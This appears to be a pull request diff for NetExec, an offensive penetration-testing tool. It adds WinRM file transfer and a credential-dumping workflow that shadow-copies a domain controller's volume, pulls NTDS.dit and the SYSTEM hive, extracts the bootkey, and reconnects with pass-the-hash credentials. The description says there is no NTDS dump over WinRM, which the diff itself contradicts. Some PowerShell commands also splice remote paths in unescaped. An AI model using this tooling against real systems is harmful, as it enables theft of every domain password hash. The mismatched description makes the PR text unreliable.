+# connections (four measured as the sweet spot on both 2008 R2 and 2019)
+SINGLE_READ_MAX = 4 * 1024 * 1024
+CHUNK_SIZE = 4 * 1024 * 1024
+STREAMS = 4
+
+
+class FileTransfer:
+    """File reads over WS-Management.
+
+    The routing of get_file, the entry point the winrm protocol hands
+    out:
+
+        get_file --> _file_size --> FileTransfer_WMI --served--> done
+                                       |
+                                       | fault: no PowerShell v3
+                                       | (2008 R2 stock), a stalled
+                                       | GET, or a missing file
+                                       v
+                            FileTransfer_Compatible
+
+    _file_size                 CIM_DataFile GET (no process involved),
+                               PowerShell probe for the kernel paths
+                               the provider cannot see.  None = a
+                               missing file, or a kernel path under
+                               PowerShell 2.0
+
+    FileTransfer_WMI           one PS_ModuleFile GET, zero process on
+                               the target, not even a runspace
+                                 <= 375KB   within the stock envelope
+                                 >  375KB   MaxEnvelopeSizeKb raised
+                                            for the read and restored
+                                            after: a crash in between
+                                            leaves the bigger value
+                                            behind
+
+    FileTransfer_Compatible    the PowerShell machinery, every system
+                                 GLOBALROOT chunked slices directly,
+                                            the .NET of PS 3+ reads
+                                            kernel paths; under PS 2.0
+                                            the size answers None and
+                                            a native cmd copy bridges
+                                            to a normal path
+                                 DOS path   <= 4MB one ReadAllBytes
+                                            invoke, > 4MB chunked
+                                            slices over STREAMS
+                                            parallel connections,
+                                            server memory flat
+                                            whatever the file size
+    """
+
+    def __init__(self, connection):
+        self.connection = connection
+        self.logger = connection.logger
+
+    def get_file(self, remote_path, download_path):
+        # sized once here, both transfers below work from it
+        file_size = self._file_size(remote_path)
+        try:
+            if FileTransfer_WMI(self.connection).get_file(remote_path, download_path, file_size):
+                return True
+        except (WSManFaultError, WinRMTransportError) as e:
+            # no Powershellv3 namespace (a system predating PowerShell v3)
+            # or a stalled GET: the machinery decides what still works - a
+            # missing file faults the same way and fails there too
+            self.logger.debug(f"{remote_path}: no PS_ModuleFile read: {e}")
+        return FileTransfer_Compatible(self.connection).get_file(remote_path, download_path, file_size)
+
+    def _file_size(self, remote_path):
+        """File size, through a CIM_DataFile GET first (no process
+        involved) and a PowerShell probe for the kernel paths the provider
+        cannot see. None when neither sees the file: missing, or a kernel
+        path under PowerShell 2.0.
+        """
+        selector = SelectorSet()
+        selector.add_option("Name", remote_path)
+        try:
+            res = self.connection.conn.wsman.get(CIM_DATAFILE_URI, selector_set=selector)
+            for element in res.iter():
+                if element.tag.endswith("}FileSize") and element.text:
+                    return int(element.text)
+        except WSManFaultError as e:
+            self.logger.debug(f"No CIM_DataFile size for {remote_path}: {e}")
+        try:
+            output = self.connection.ps_execute(f"[IO.File]::OpenRead('{remote_path}').Length", True) or ""
+            return int(output.strip().splitlines()[-1])
+        except (ValueError, IndexError):
+            return None
+
+
+class FileTransfer_WMI(FileTransfer):
+    """The PS_ModuleFile route: one GET per file, no process involved on
+    the target, not even a runspace.
+    """
+
+    def get_file(self, remote_path, download_path, file_size=None):
+        if file_size is None:
+            file_size = self._file_size(remote_path)
+        if file_size is not None and file_size > ENVELOPE_FILE_MAX:
+            # the response would not fit the stock envelope: raise it for
+            # the read and restore the original value right after, a crash
+            # in between leaves the raised value behind
+            original_kb = self._get_envelope_size()
+            envelope_kb = max(original_kb, int(file_size * 4 / 3 / 1024) + 128)
+            self._set_envelope_size(envelope_kb)
+            try:
+                return self._get_module_file(remote_path, download_path)
+            finally:
+                try:
+                    self._set_envelope_size(original_kb)
+                except Exception as e:
+                    self.logger.fail(f"Could not restore MaxEnvelopeSizeKb to {original_kb}KB, the service keeps the raised {envelope_kb}KB: {e}")
+        return self._get_module_file(remote_path, download_path)
+
+    def _get_module_file(self, remote_path, download_path):
+        selector = SelectorSet()
+        selector.add_option("InstanceID", remote_path)
+        res = self.connection.conn.wsman.get(PS_MODULE_FILE_URI, selector_set=selector)
+        for element in res.iter():
+            if element.tag.endswith("}FileData") and element.text:
+                with open(download_path, "wb") as file:
+                    file.write(base64.b64decode(element.text.strip()))
+                return True
+        return False
+
+    def _get_envelope_size(self):
+        """The current service MaxEnvelopeSizeKb, DEFAULT_ENVELOPE_KB when
+        the config does not answer.
+        """
+        res = self.connection.conn.wsman.get(CONFIG_URI)
+        for element in res.iter():
+            if element.tag.endswith("}MaxEnvelopeSizekb") and element.text:
+                return int(element.text)
+        return DEFAULT_ENVELOPE_KB
+
+    def _set_envelope_size(self, size_kb):
+        """Set the service MaxEnvelopeSizeKb, and the client side limit
+        with it: pypsrp refuses responses above its own default.
+        """
+        config = ET.Element(f"{{{CONFIG_NS}}}Config")
+        ET.SubElement(config, f"{{{CONFIG_NS}}}MaxEnvelopeSizeKb").text = str(size_kb)
+        self.connection.conn.wsman.put(CONFIG_URI, config)
+        self.connection.conn.wsman.max_envelope_size = size_kb * 1024
+
+
+class FileTransfer_Compatible(FileTransfer):
+    """The PowerShell machinery, the option that serves every system: one
+    ReadAllBytes invoke for small files (every pypsrp invoke costs a
+    fresh session, the parallel setup does not pay off), parallel chunks
+    for big ones, and a native cmd copy bridge for the kernel paths the
+    managed layer of PowerShell 2.0 rejects whatever their form.
+    """
+
+    def get_file(self, remote_path, download_path, file_size=None):
+        if "GLOBALROOT" in remote_path.upper():
+            return self._get_file_chunked(remote_path, download_path, file_size)
+        if file_size is None:
+            file_size = self._file_size(remote_path)
+        if file_size is not None and file_size <= SINGLE_READ_MAX:
+            return self._read_whole(remote_path, download_path)
+        return self._get_file_chunked(remote_path, download_path, file_size)
+
+    def _read_whole(self, remote_path, download_path):
+        """The whole file in a single ReadAllBytes invoke."""
+        output = self.connection.ps_execute(f"[Convert]::ToBase64String([IO.File]::ReadAllBytes('{remote_path}'))", True)
+        if output is None:
+            return False
+        with open(download_path, "wb") as file:
+            file.write(base64.b64decode(output.strip()))
+        return True
+
+    def _get_file_chunked(self, remote_path, download_path, file_size=None):
+        """STREAMS slices of the file in parallel, one runspace connection
+        each: the round trips overlap and the throughput multiplies.
+        """
+        if file_size is None:
+            file_size = self._file_size(remote_path)
+        if file_size is None:
+            # kernel path under PowerShell 2.0: the managed layer rejects
+            # the open, only native cmd copy reads it
+            if "GLOBALROOT" in remote_path.upper():
+                return self._get_file_through_copy(remote_path, download_path)
+            return False
+        with open(download_path, "wb") as file:
+            file.truncate(file_size)
+            if file_size == 0:
+                return True
+
+        self.logger.debug(f"Fetching {remote_path} ({file_size} bytes) in {STREAMS} parallel slices")
+        slices = [None] * STREAMS
+
+        def reader(index):
+            start = file_size * index // STREAMS
+            end = file_size * (index + 1) // STREAMS
+            try:
+                slices[index] = self._read_range(self._new_client(), remote_path, start, end)
+            except Exception as e:
+                self.logger.debug(f"Slice {index} of {remote_path} failed: {e}")
+
+        threads = [threading.Thread(target=reader, args=(i,)) for i in range(STREAMS)]
+        for thread in threads:
+            thread.start()
+        for thread in threads:
+            thread.join()
+
+        if any(part is None for part in slices):
+            return False
+        with open(download_path, "r+b") as file:
+            for index, data in enumerate(slices):
+                file.seek(file_size * index // STREAMS)
+                file.write(data)
+        return True
+
+    def _read_range(self, conn, remote_path, start, end):
+        """One slice of the file as bytes, in CHUNK_SIZE .NET reads."""
+        data = b""
+        offset = start
+        while offset < end:
+            read_size = min(CHUNK_SIZE, end - offset)
+            command = (
+                f"$fs=[IO.File]::OpenRead('{remote_path}'); $fs.Seek({offset}, 0) | Out-Null; "
+                f"$b=New-Object byte[] {read_size}; $fs.Read($b, 0, {read_size}) | Out-Null; "
+                f"[Convert]::ToBase64String($b); $fs.Close()"
+            )
+            output, _, _ = conn.execute_ps(command)
+            data += base64.b64decode((output or "").strip())
+            offset += read_size
+        return data
+
+    def _get_file_through_copy(self, remote_path, download_path):
+        """Copy to a random normal path with native cmd, read the copy,
+        then clean it up.
+        """
+        temp_path = f"C:\\Windows\\Temp\\{gen_random_string(8)}"
+        try:
+            copy_command = f'copy /Y "{remote_path}" {temp_path}'
+            self.connection.ps_execute(f"cmd /c '{copy_command}'", True)
+            temp_size = self._file_size(temp_path)
+            if temp_size is not None and temp_size <= SINGLE_READ_MAX:
+                return self._read_whole(temp_path, download_path)
+            return self._get_file_chunked(temp_path, download_path, temp_size)
+        except Exception as e:
+            self.logger.debug(f"Cannot copy {remote_path} to a readable path: {e}")
+            return False
+        finally:
+            with contextlib.suppress(Exception):
+                self.connection.ps_execute(f"cmd /c 'del {temp_path}'", True)
+
+    def _new_client(self):
+        """A dedicated connection per stream: the NTLM authentication is
+        bound to the connection, streams cannot share one. Chunk invokes
+        carry a few MB of base64, the read timeout is raised for the slow
+        or inspected hosts the default 30s does not cover.
+        """
+        conn = self.connection
+        # the base protocol leaves password empty on hash logins
+        password = conn.password or f"{conn.lmhash}:{conn.nthash}"
+        return Client(
+            conn.host,
+            port=conn.port,
+            auth="ntlm",
+            username=f"{conn.domain}\\{conn.username}",
+            password=password,
+            ssl=conn.ssl,
+            cert_validation=False,
+            read_timeout=120,
+        )

--- a/nxc/protocols/winrm/proto_args.py
+++ b/nxc/protocols/winrm/proto_args.py
@@ -1,4 +1,6 @@
-from nxc.helpers.args import DisplayDefaultsNotNone
+from argparse import _StoreTrueAction
+
+from nxc.helpers.args import DisplayDefaultsNotNone, get_conditional_action
 
 
 def proto_args(parser, parents):
@@ -14,10 +16,22 @@ def proto_args(parser, parents):
     dgroup.add_argument("--local-auth", action="store_true", help="authenticate locally to each target")
 
     cgroup = winrm_parser.add_argument_group("Credential Gathering")
-    cgroup.add_argument("--dump-method", action="store", default="cmd", choices={"cmd", "powershell"}, help="Select shell type in hashes dump for sam or lsa")
     cgroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
     cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
+    ntds_arg = cgroup.add_argument("--ntds", action="store_true", help="dump the NTDS.dit from target DCs using VSS")
+    cgroup.add_argument("--history", action="store_true", help="Also retrieve password history (NTDS.dit or SAM)")
+    kerb_keys_arg = cgroup.add_argument("--kerberos-keys", action=get_conditional_action(_StoreTrueAction), make_required=[], help="Also dump Kerberos AES and DES keys from target DC (NTDS.dit)")
+    enabled_arg = cgroup.add_argument("--enabled", action=get_conditional_action(_StoreTrueAction), make_required=[], help="Only dump enabled targets from DC (NTDS.dit)")
+    kerb_keys_arg.make_required = [ntds_arg]
+    enabled_arg.make_required = [ntds_arg]
+    cgroup.add_argument("--user", dest="userntds", type=str, help="Dump selected user from DC (NTDS.dit)")
     cgroup.add_argument("--dpapi", action="store_true", help="dump user's Credential Manager secrets from target systems")
+    cgroup.add_argument("--list-snapshots", nargs="?", dest="list_snapshots", const="ADMIN$", help="Lists the VSS snapshots (default: %(const)s)")
+    cgroup.add_argument("--use-snapshot-id", dest="use_snapshot_id", default=None, help="Reuse a VSS snapshot from --list-snapshots for hashdump instead of creating one")
+
+    wmi_group = winrm_parser.add_argument_group("WMI Queries")
+    wmi_group.add_argument("--wmi-query", metavar="QUERY", dest="wmi_query", type=str, help="Issues the specified WMI query via PowerShell CIM cmdlets")
+    wmi_group.add_argument("--wmi-namespace", metavar="NAMESPACE", default="root\\cimv2", help="WMI Namespace (default: %(default)s)")
 
     mapping_enum_group = winrm_parser.add_argument_group("Mapping/Enumeration")
     mapping_enum_group.add_argument("--dir", nargs="?", type=str, const="", help="List the content of a path (default path: '%(const)s')")

--- a/nxc/protocols/winrm/remoteops.py
+++ b/nxc/protocols/winrm/remoteops.py
@@ -1,0 +1,167 @@
+import time
+from binascii import hexlify
+
+from impacket.examples.secretsdump import LocalOperations
+from pypsrp.exceptions import WSManFaultError
+from pypsrp.wsman import SelectorSet
+
+WMI_BASE = "http://schemas.microsoft.com/wbem/wsman/1/wmi"
+
+
+class RemoteOperations:
+    def __init__(self, connection, shadow_id=None):
+        self.connection = connection
+        self.wsman = connection.conn.wsman
+        self.logger = connection.logger
+
+        # Cached variables
+        self.bootkey = None
+        if shadow_id is not None:
+            self.logger.display(f"Using existing VSS Snapshot ID: {shadow_id}")
+        self._shadow_id = shadow_id
+        # Snapshot devices by volume, created on demand: the NTDS database
+        # can live on a drive other than the system one
+        self._shadow_devices = {}
+
+        # Keep track of the shadow copies we created, to delete them in finish()
+        self._created_shadow_ids = []
+
+    def delete_shadowcopy(self, shadow_id):
+        selector = SelectorSet()
+        selector.add_option("ID", shadow_id)
+        self.logger.debug(f"Trying to delete ShadowCopy with ID {shadow_id}")
+        try:
+            self.wsman.delete(f"{WMI_BASE}/root/cimv2/Win32_ShadowCopy", selector_set=selector)
+        except WSManFaultError as e:
+            # WinRM 2.0 (2008 R2 / Windows 7) does not support WS-Delete on
+            # the WMI plugin: fall back to vssadmin through the shell
+            if e.code != 2150858801:
+                raise
+            self.logger.debug(f"WMI plugin has no Delete operation, falling back to vssadmin for {shadow_id} (process creation)")
+            self.connection.execute(f"vssadmin delete shadows /shadow={shadow_id} /quiet", True)
+        self.logger.debug(f"ShadowCopy with ID {shadow_id} successfully deleted")
+        self._created_shadow_ids.remove(shadow_id)
+
+    def finish(self):
+        """Delete the shadow copies we created, while the connection is still alive.
+
+        Called explicitly at the end of the operations using this class:
+        the destructor only runs after the protocol already disconnected,
+        when it can no longer reach the service.
+        """
+        for shadow_id in list(self._created_shadow_ids):
+            try:
+                self.delete_shadowcopy(shadow_id)
+            except Exception as e:
+                self.logger.fail(f"Could not delete ShadowCopy ID {shadow_id}. You will need to delete this by yourself. ({e})")
+
+    def __del__(self):
+        self.finish()
+
+    def create_shadowcopy(self, volume="C:\\"):
+        shadow_id = None
+        try:
+            self.logger.debug(f"Trying to create a VSS snapshot of {volume} remotely via WSMan")
+            result = self.connection.wmi_invoke(
+                "root\\cimv2",
+                "Win32_ShadowCopy",
+                "Create",
+                {"Context": "ClientAccessible", "Volume": volume},
+            )
+            if str(result.get("ReturnValue")) == "0":
+                shadow_id = result.get("ShadowID")
+                self._created_shadow_ids.append(shadow_id)
+                self.logger.debug(f"Shadow Copy created at ID {shadow_id}")
+            else:
+                self.logger.debug(f"Win32_ShadowCopy.Create returned {result.get('ReturnValue')}")
+        except Exception as e:
+            self.logger.debug(f"Cannot create ShadowCopy: {e}")
+        return shadow_id
+
+    def get_shadowcopy_path(self, shadow_id=None):
+        if shadow_id is None:
+            shadow_id = self.shadow_id
+        device_object = None
+        query = f'SELECT DeviceObject FROM Win32_ShadowCopy WHERE ID = "{shadow_id}"'
+        for _ in range(3):
+            records = self.connection.wql_enumerate(query, "root\\cimv2")
+            if records:
+                device_object = records[0].get("DeviceObject")
+                break
+            # the instance is queryable shortly after Create returns
+            time.sleep(2)
+        if device_object:
+            self.logger.debug(f"Found ShadowCopy at {device_object}")
+        return device_object
+
+    @property
+    def shadow_id(self):
+        if self._shadow_id is None:
+            self._shadow_id = self.create_shadowcopy()
+        return self._shadow_id
+
+    def shadow_path(self, file_path):
+        """Map a live file path to its location inside a snapshot of its volume."""
+        volume = file_path[:3]
+        if volume not in self._shadow_devices:
+            shadow_id = self.shadow_id if volume.upper() == "C:\\" else self.create_shadowcopy(volume)
+            if shadow_id is None:
+                return None
+            self._shadow_devices[volume] = self.get_shadowcopy_path(shadow_id)
+        device = self._shadow_devices[volume]
+        return f"{device}{file_path[2:]}" if device else None
+
+    def get_file(self, remote_path, download_path):
+        """Fetch a remote file through the protocol file transfer.
+
+        The registry hives are locked by the OS on the live filesystem, so the
+        files are fetched from the shadow copy GLOBALROOT path instead.
+        """
+        return self.connection.file_transfer.get_file(remote_path, download_path)
+
+    def get_ntds_location(self):
+        """Read the NTDS database path from the registry through StdRegProv."""
+        result = self.connection.wmi_invoke(
+            "root\\default",
+            "StdRegProv",
+            "GetStringValue",
+            {
+                "hDefKey": 2147483650,  # HKEY_LOCAL_MACHINE
+                "sSubKeyName": r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
+                "sValueName": "DSA Database file",
+            },
+        )
+        if str(result.get("ReturnValue")) == "0":
+            return result.get("sValue")
+        return None
+
+    def get_ntds(self, output_filename):
+        """Fetch the NTDS database from a snapshot of its volume."""
+        ntds_location = self.get_ntds_location()
+        if not ntds_location:
+            self.logger.fail("Could not find the NTDS database path (is this a Domain Controller?)")
+            return None
+        self.logger.debug(f"NTDS database located at {ntds_location}")
+
+        ntds_path = self.shadow_path(ntds_location)
+        if ntds_path is None or not self.get_file(ntds_path, f"{output_filename}.dit"):
+            self.logger.fail("Could not get the NTDS database")
+            return None
+        return f"{output_filename}.dit"
+
+    def get_bootkey(self, output_filename):
+        if self.bootkey is not None:
+            return self.bootkey
+
+        # the SYSTEM hive is the biggest transfer of the dump
+        self.logger.display("Fetching the SYSTEM hive for the bootkey...")
+        system_hive_path = self.shadow_path(r"C:\Windows\System32\config\SYSTEM")
+        if system_hive_path is None or not self.get_file(system_hive_path, f"{output_filename}.system"):
+            self.logger.fail("Could not get the SYSTEM hive")
+            return None
+        self.logger.debug("Got SYSTEM hive")
+
+        local_operations = LocalOperations(f"{output_filename}.system")
+        self.bootkey = local_operations.getBootKey()
+        self.logger.debug(f"Got bootkey: 0x{hexlify(self.bootkey).decode('utf-8')}")
+        return self.bootkey


### PR DESCRIPTION
> **Depends on #1400** — merge that first.

## Description

**winrm side**: saves the hives with reg save wrapped in a runspace, fetches them back through the file transfer, parses locally and deletes in the same session. reg save is refused on `HKLM\SECURITY` for a plain backup operator, so that hive is optional. No NTDS dump over winrm.

**smb side**: rewritten with impacket's regsecrets — backup-intent opens and registry queries through the SeBackupPrivilege, no RegSaveKey and no hive file dropped on the target.

## Type of change
- [x] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dp loot, lsassy, etc)
- [x] This PR was created with the assistance of AI (Claude Code - implementation and live testing)

## Setup guide for the review
Just install pypsrp

## Screenshots (if appropriate)
(placeholder - screenshots to be added)

## Checklist
- [x] I have ran Ruff against my changes (`poetry run ruff check .`, use `--fix` to automatically fix what it can)
- [x] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [ ] I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
- [x] I have performed a self-review of my own code (_not_ an AI review)
- [x] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation